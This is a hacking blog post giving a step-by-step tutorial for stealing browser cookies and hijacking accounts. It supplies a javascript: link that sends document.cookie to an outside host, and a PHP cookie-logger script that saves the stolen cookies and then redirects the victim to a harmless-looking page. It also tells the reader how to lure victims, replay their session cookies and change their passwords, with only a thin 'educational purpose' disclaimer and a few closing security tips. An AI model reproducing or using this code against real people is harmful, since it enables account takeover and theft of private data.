//

10
Cookie hijacking

yesterday  i got mail about cookie hijacking so i find the best way to do and i post in this blog so enjoy



Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a Cookie Logger?

A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger


Note :- This Tutorial is For Education Purpose Only… & Its For Better Security For Ur Self…


Step 1  :- First you have to create a file which can capture a person's cookie.So follow the following process.  

this is last step actually ↓ 

  Give this code to victim to run in his browser (notice that here site name is way2h.blogspot.com)


javascript:document.location='http://way2h.blogspot.com/cookie.php?ex='.concat(escape(document.cookie)); 


Step 2 :- Now you have to change "http://www.way2h.blogspot.com/" to your site, Remember one thing you should not upload the files into a directory.


Step 3 :- Copy the Following Script into a Notepad File and Save the file as cookie.php:

  <?php
$filename = "logfile.txt";
if (isset($_GET["ex"]))
{
if (!$handle = fopen($filename, 'a'))
{
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["ex"]) === FALSE)
{

exit;
}
}

header("Location: http://ilovemessenger.msn.com");
fclose($handle);
exit;
}
exit;
?>


Upload this file to your server

 cookie.php -> http://www.yoursite.com/cookielogger.php

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

www.ofees.net
www.t35.com
www.ripway.com
http://my3gb.com/
http://000webhost.com/

Step 5:- Now your cookie logger is ready to be used. Now All U Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them…

Note :- Give Ur Victim The Link Of GIF File… 

javascript:document.location='http://way2h.blogspot.com/cookie.php?ex='.concat(escape(document.cookie)); 

So the person who click it will think it is fun but it redirects to http://ilovemessenger.msn.com


Step 6 :- So if anyone open you it  will get a the cookie in the logfile.txt


Step 7 :- And something like this will be stored in your "logfile.txt"

 phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 8 :- To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Now for this you will need a firefox addon named "Add and edit cookies

Note :- Make Sure that ur Victim should be Online because u are Hijacking ur Victim’s Session…


So if the Victim clicks on Logout you will also Logout automatically…
but once you have changed the password then you can again login with the new password… but the victim would not be able to login with it…

MUST READ :- I don’t take any responsibility for what you do with this script…Its Only for Educational purpose only…


How To Get Secure From Cookie Loggers / Cookie Stealer ???

  •  use NO SCRIPT (its a firefox addon )  this is best rest of other :P
  • Don’t Click On Any Links Given By Anyone…
  • Use Secure Connection Security In Facebook…
  • Use Login Notifications For Better Security…
  • Don’t Click On SPAM Links Videos Or Pics…
  • Never Ever Try RATS or KeyLoggers…
  • Be Safe…Don’t Use Any Softwares For Hacking…Coz All Are Fakes…
  • Hacking is Not Playing With SomeOne’s Account… 
  • Real Hacking is Much More Than It…
All The Hackers are Not Same… We are Humans & We Had Heart Also…

Post a Comment

 
Top